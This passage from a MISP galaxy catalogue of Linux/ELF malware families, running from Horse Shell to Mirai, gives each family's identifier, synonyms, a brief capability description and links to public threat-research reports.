- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://twitter.com/malwrhunterteam/status/1455628865229950979 - webarchive
- https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive - webarchive
- https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/ - webarchive
- https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html - webarchive
- https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/ - webarchive
- https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again - webarchive
- https://github.com/reecdeep/HiveV5_file_decryptor - webarchive
- https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://github.com/rivitna/Malware/tree/main/Hive - webarchive
- https://twitter.com/ESETresearch/status/1454100591261667329 - webarchive
- https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/ - webarchive
- https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://blog.group-ib.com/hive - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Horse Shell
Check Point Research describes Horse Shell as a custom MIPS32 ELF implant embedded in a modified firmware image attributed to the Chinese state-sponsored actor "Camaro Dragon". As the main implant inserted into the firmware by the attackers, it gives them three main capabilities:
- Remote shell: execution of arbitrary shell commands on the infected router
- File transfer: upload and download of files to and from the infected router
- SOCKS tunneling: relaying communication between different clients
Internal MISP references
UUID 9d04d96a-92fd-4731-a3b5-a3fdafd3e523
which can be used as unique global reference for Horse Shell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hubnr
Internal MISP references
UUID c55389b0-e778-4cf9-9030-3d1efc1224c9
which can be used as unique global reference for Hubnr
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HyperSSL (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HyperSSL (ELF).
Known Synonyms |
---|
SysUpdate |
Internal MISP references
UUID 263aaef5-9758-49f1-aff1-9a509f545bb3
which can be used as unique global reference for HyperSSL (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
iceFire
Internal MISP references
UUID c03b2f7f-31ed-4133-b947-4b8846d90f19
which can be used as unique global reference for iceFire
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Icnanker
Internal MISP references
UUID cd9f128b-6502-4e1b-a5b3-25f3c7f01ca3
which can be used as unique global reference for Icnanker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
INC
Internal MISP references
UUID fa3f90a3-40e3-4636-90f9-3e02bf645afd
which can be used as unique global reference for INC
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.inc - webarchive
- https://twitter.com/malwrhunterteam/status/1689029459255373826 - webarchive
- https://cisoseries.com/cybersecurity-news-inc-targets-healthcare-providence-schools-cyberattack-apple-ipads-bricked/ - webarchive
- https://nikhilh-20.github.io/blog/inc_ransomware/ - webarchive
- https://x.com/MsftSecIntel/status/1836456406276342215 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IoT Reaper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IoT Reaper.
Known Synonyms |
---|
IoTroop |
Reaper |
iotreaper |
Internal MISP references
UUID 37c357a1-ec09-449f-b5a9-c1ef1fba2de2
which can be used as unique global reference for IoT Reaper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper - webarchive
- https://research.checkpoint.com/new-iot-botnet-storm-coming/ - webarchive
- http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/ - webarchive
- https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IPStorm (ELF)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (ELF).
Known Synonyms |
---|
InterPlanetary Storm |
Internal MISP references
UUID a24f9c4b-1fa7-4da2-9929-064345389e67
which can be used as unique global reference for IPStorm (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm - webarchive
- https://maldbg.com/ipstorm-golang-malware-windows - webarchive
- https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/ - webarchive
- https://www.justice.gov/usao-pr/pr/russian-and-moldovan-national-pleads-guilty-operating-illegal-botnet-proxy-service - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IZ1H9
According to Fortinet, IZ1H9 is a Mirai-based DDoS botnet.
Internal MISP references
UUID 6e98a149-9ce2-4750-9680-69f3ced5f33e
which can be used as unique global reference for IZ1H9
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JenX
Internal MISP references
UUID 6a4365fc-8448-4270-ba93-0341788d004b
which can be used as unique global reference for JenX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kaden
Kaden is a DDoS botnet that is heavily based on Bashlite/Gafgyt. Besides its DDoS capabilities it contains wiper functionality, which currently cannot (yet) be triggered.
Internal MISP references
UUID eebd19b4-6671-4b17-be6a-cc467e5869a5
which can be used as unique global reference for Kaden
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kaiji
Kaiji surfaced in late April 2020. Intezer describes it as DDoS malware written in Go that spreads through SSH brute-force attacks; recovered function names are English renderings of Chinese words, hinting at its origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.
Internal MISP references
UUID 33fe7943-c1b3-48d5-b287-126390b091f0
which can be used as unique global reference for Kaiji
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji - webarchive
- https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/ - webarchive
- https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/ - webarchive
- https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.elastic.co/security-labs/betting-on-bots - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kaiten
According to Netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer, allowing it to perform other malicious activities. The Trojan does not create copies of itself; it arrives on a system as a file dropped by other malware or downloaded unknowingly by users visiting malicious sites.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kaiten.
Known Synonyms |
---|
STD |
Internal MISP references
UUID 9b618703-58f6-4f0b-83a4-d4f13e2e5d12
which can be used as unique global reference for Kaiten
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day - webarchive
- https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf - webarchive
- https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/ - webarchive
- https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html - webarchive
- https://www.lacework.com/blog/the-kek-security-network/ - webarchive
- https://www.lacework.com/the-kek-security-network/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
kerberods
Internal MISP references
UUID e3787d95-2595-449e-8cf9-90845a9b7444
which can be used as unique global reference for kerberods
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/ - webarchive
- https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html - webarchive
- https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang - webarchive
- https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916 - webarchive
- https://blog.talosintelligence.com/2019/09/watchbog-patching.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KEYPLUG
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KEYPLUG.
Known Synonyms |
---|
ELFSHELF |
Internal MISP references
UUID 2c4bfc14-3ea4-4ced-806a-fcac30b2a9d7
which can be used as unique global reference for KEYPLUG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.keyplug - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf - webarchive
- https://www.mandiant.com/resources/mobileiron-log4shell-exploitation - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://twitter.com/CyberJack42/status/1501290277864046595 - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/ - webarchive
- https://web.archive.org/web/20240523105313/https://yoroi.company/en/research/uncovering-an-undetected-keyplug-implant-attacking-industries-in-italy/ - webarchive
- https://www.mandiant.com/resources/apt41-us-state-governments - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
kfos
Internal MISP references
UUID 5e353bc2-4d32-409b-aeb6-c7df32607c56
which can be used as unique global reference for kfos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kinsing
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kinsing.
Known Synonyms |
---|
h2miner |
Internal MISP references
UUID ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea
which can be used as unique global reference for Kinsing
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/ - webarchive
- https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces - webarchive
- https://www.aquasec.com/blog/loony-tunables-vulnerability-exploited-by-kinsing/ - webarchive
- https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/ - webarchive
- https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html - webarchive
- https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html - webarchive
- https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039 - webarchive
- https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/ - webarchive
- https://redcanary.com/blog/kinsing-malware-citrix-saltstack/ - webarchive
- https://www.aquasec.com/blog/aqua-cndr-stop-dreambus-botnet-attack/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://1665891.fs1.hubspotusercontent-na1.net/hubfs/1665891/Threat%20reports/AquaSecurity_Kinsing_Demystified_Technical_Guide.pdf - webarchive
- https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743 - webarchive
- https://www.aquasec.com/blog/kinsing-malware-exploits-novel-openfire-vulnerability/ - webarchive
- https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability - webarchive
- https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/moneylibra/ - webarchive
- https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts - webarchive
- https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/ - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://twitter.com/IntezerLabs/status/1259818964848386048 - webarchive
- https://twitter.com/MsftSecIntel/status/1535417776290111489 - webarchive
- https://unit42.paloaltonetworks.com/cve-2020-25213/ - webarchive
- https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KIVARS (ELF)
Internal MISP references
UUID e8b24118-4ce8-471b-8683-1077a0f5f2a9
which can be used as unique global reference for KIVARS (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kobalos
Internal MISP references
UUID 201d54ae-7fb0-4522-888c-758fa9019737
which can be used as unique global reference for Kobalos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos - webarchive
- https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf - webarchive
- https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Krasue RAT
Internal MISP references
UUID b111325d-dd90-47cc-8777-fcb7e610a76e
which can be used as unique global reference for Krasue RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KrustyLoader
An ELF x64 downloader written in Rust, first discovered on Ivanti Connect Secure VPN appliances after the exploitation of CVE-2024-21887 and CVE-2023-46805. It downloads a Sliver backdoor and then deletes itself.
Internal MISP references
UUID 1a5d8c38-42fa-4405-83fc-4e07b4407205
which can be used as unique global reference for KrustyLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KTLVdoor (ELF)
According to Trend Micro, KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning.
Internal MISP references
UUID 3ee0b08d-b872-4eda-8f8f-6d2f37b053ae
which can be used as unique global reference for KTLVdoor (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kuiper (ELF)
Internal MISP references
UUID 30ad3f49-bffd-4383-88b3-067ccfac7038
which can be used as unique global reference for Kuiper (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lady
Internal MISP references
UUID f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d
which can be used as unique global reference for Lady
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LeetHozer
Internal MISP references
UUID e9f2857a-cb91-4715-ac8b-fdc89bc9a03e
which can be used as unique global reference for LeetHozer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lightning Framework
Internal MISP references
UUID 927bc8fc-fef4-4331-877d-18bcd33bdf9c
which can be used as unique global reference for Lightning Framework
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LiLock
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LiLock.
Known Synonyms |
---|
Lilocked |
Lilu |
Internal MISP references
UUID 1328ed0d-9c1c-418b-9a96-1c538e4893bc
which can be used as unique global reference for LiLock
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock - webarchive
- https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/ - webarchive
- https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html - webarchive
- https://fossbytes.com/lilocked-ransomware-infected-linux-servers/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
lilyofthevalley
Internal MISP references
UUID f789442f-8f50-4e55-8fbc-b93d22b5314e
which can be used as unique global reference for lilyofthevalley
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Linodas
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Linodas.
Known Synonyms |
---|
DinodasRAT |
XDealer |
Internal MISP references
UUID e47295eb-e907-410a-ab16-62ed8652d8bf
which can be used as unique global reference for Linodas
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LiquorBot
Bitdefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which appears to be under active development and has recently incorporated Monero cryptocurrency mining. Notably, LiquorBot is written in Go (Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and CSP-style concurrency.
Internal MISP references
UUID 3fe8f3db-4861-4e78-8b60-a794fe22ae3f
which can be used as unique global reference for LiquorBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LockBit (ELF)
Internal MISP references
UUID afce6aba-d4c4-49fa-b9a9-1a70e92e5a0e
which can be used as unique global reference for LockBit (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit - webarchive
- https://analyst1.com/ransomware-diaries-volume-1/ - webarchive
- https://nationalcrimeagency.gov.uk/news/nca-leads-international-investigation-targeting-worlds-most-harmful-ransomware-group - webarchive
- https://www.ic3.gov/Media/News/2022/220204.pdf - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 - webarchive
- https://analyst1.com/ransomware-diaries-volume-3-lockbits-secrets/ - webarchive
- https://github.com/prodaft/malware-ioc/tree/master/PTI-257 - webarchive
- https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html - webarchive
- https://www.washingtonpost.com/business/2024/02/20/lockbit-ransomware-cronos-nca-fbi/ - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/ - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation - webarchive
- https://securelist.com/crimeware-report-lockbit-switchsymb/110068/ - webarchive
- https://blog.compass-security.com/2022/03/vpn-appliance-forensics/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/ - webarchive
- https://analyst1.com/lockbit-takedown-operation-cronos-a-long-awaited-psyops-against-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf - webarchive
- https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/ - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://security.packt.com/understanding-lockbit/ - webarchive
- https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants - webarchive
- https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Loerbas
Loader and Cleaner components used in attacks against high-performance computing centers in Europe.
Internal MISP references
UUID 6332d57c-c46f-4907-8dac-965b15ffbed6
which can be used as unique global reference for Loerbas
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Log Collector
Internal MISP references
UUID 0473214a-2daa-4b5b-84bc-1bcbab11ef80
which can be used as unique global reference for Log Collector
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lootwodniw
Internal MISP references
UUID cfcf8608-03e7-4a5b-a46c-af342db2d540
which can be used as unique global reference for Lootwodniw
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Luna
ESXi-encrypting ransomware written in Rust.
Internal MISP references
UUID bc9022d6-ee65-463f-9823-bc0f96963a75
which can be used as unique global reference for Luna
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Manjusaka (ELF)
Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.
Internal MISP references
UUID cd3a3a96-af66-4470-8115-b8bf3eef005a
which can be used as unique global reference for Manjusaka (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Masuta
Masuta takes advantage of the EDB 38722 D-Link exploit.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Masuta.
Known Synonyms |
---|
PureMasuta |
Internal MISP references
UUID b9168ff8-01df-4cd0-9f70-fe9e7a11eccd
which can be used as unique global reference for Masuta
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta - webarchive
- https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7 - webarchive
- https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes - webarchive
- https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Matryosh
Internal MISP references
UUID 4e989704-c49f-468c-95e1-1b7c5a58b3c4
which can be used as unique global reference for Matryosh
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Melofee
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Melofee.
Known Synonyms |
---|
Mélofée |
Internal MISP references
UUID 1ffd85bd-389c-4e04-88fd-8186423c3691
which can be used as unique global reference for Melofee
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MESSAGETAP
MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.
Internal MISP references
UUID a07d6748-3557-41ac-b55b-f4348dc2a3c7
which can be used as unique global reference for MESSAGETAP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Midrashim
An x64 ELF file infector with a non-destructive payload.
Internal MISP references
UUID fe220358-7118-4feb-b43e-cbdaf2ea09dc
which can be used as unique global reference for Midrashim
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MiKey
Internal MISP references
UUID aae3b83d-a116-4ebc-aae0-f6327ef174ea
which can be used as unique global reference for MiKey
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mirai (ELF)
Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mirai (ELF).
Known Synonyms |
---|
Katana |
Internal MISP references
UUID 17e12216-a303-4a00-8283-d3fe92d0934c
which can be used as unique global reference for Mirai (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai - webarchive
- https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html - webarchive
- https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/ - webarchive
- https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot - webarchive
- https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html - webarchive
- https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign - webarchive
- https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt - webarchive
- https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/ - webarchive
- https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/ - webarchive
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - webarchive
- https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html - webarchive
- https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/ - webarchive
- https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ - webarchive
- https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/ - webarchive
- https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
- https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/ - webarchive
- https://blog.xlab.qianxin.com/mirai-nomi-en/ - webarchive
- https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039 - webarchive
- https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18 - webarchive
- https://unit42.paloaltonetworks.com/new-mirai-variant-mukashi/ - webarchive
- https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/ - webarchive
- https://synthesis.to/2021/06/30/automating_string_decryption.html - webarchive
